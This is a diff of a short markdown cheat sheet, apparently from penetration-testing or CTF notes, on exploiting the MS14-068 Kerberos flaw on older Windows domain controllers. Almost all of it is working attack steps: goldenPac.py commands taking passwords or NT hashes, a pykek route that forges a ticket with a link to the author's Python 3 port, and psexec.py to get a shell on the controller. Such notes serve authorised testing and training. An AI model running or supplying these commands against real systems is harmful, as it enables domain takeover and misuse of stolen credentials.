--- a/MS14-068.md
+++ b/MS14-068.md
@@ -1,29 +1,36 @@
 
 # MS 14-068
 
-Required: domain user credentials, connection to DC, kerberos port open (is a kerberos vuln)
-Vulnerable: Windows server 2008 R2 or older...
+Required: 
+ - Domain user credentials
+ - Connection to DC
+ - Kerberos port open (is a kerberos vuln)
+ - Vulnerable Windows server 2008 R2 or older...
+<br>
 
+### Option 1 (Impacket):
 from impacket suite:
 
-`goldenPac.py '<domain>/<user>:<password><machine.domain>`
+`goldenPac.py '<domain>/<user>:<password>@<machine.domain>'` or
 
-IMPORTAN NOTE 1: Exploit it first time and look what domain targets (Example mantis.htb.local)
-then put this domain at /etc/hosts
+`goldenPac.py  '<domain>/<user>:@<machine.domain>' -hashes :'NThash'`
 
-IMPORTAN NOTE 2: In the domain*, after the "@" simbol put only text, not numbers.
-And also put this text in /etc/hosts to make sure it finds the IP.
+IMPORTAN NOTE: When using Impacket (and others) tools that autenticates against kerberos avoid setting a numeric IP direction. Use machine.domain format, and adjust your /etc/hosts to make sure it find the correct IP. 
 
 source: https://tools.thehacker.recipes/impacket/examples/goldenpac.py
 
--------------------------------------------------------------------------
+<br>
 
-Aditionally, use my adaptation to python3 from pykek.
+### Option 2 (pykek):
 
-extract user sid from ldap or rpc
+You can use pykek from original repo (python2). -> https://github.com/mubix/pykek
 
-python3 ms14-068.py -u '<user>'@'<domain>' -p '<password>' -s "<user sid>" -d "<dc ip>"
+Or, if only python3 is possible use my adaptation for python3. -> https://github.com/ArtesOscuras/Tools/blob/main/pykek_ms14-068_python3.zip
 
-export ccache file -> export KRB5CCNAME=TGT_ticket...ccache
+Extract user sid from ldap or rpc.
 
-psexec.py '<domain>/<user>:@<machine.domain>' -no-pass -k
+`python3 ms14-068.py -u '<user>'@'<domain>' -p '<password>' -s "<user SID>" -d "<ip>"`
+
+Export ccache file -> `export KRB5CCNAME=TGT_ticket...ccache`
+
+`psexec.py '<domain>/<user>:@<machine.domain>' -no-pass -k`
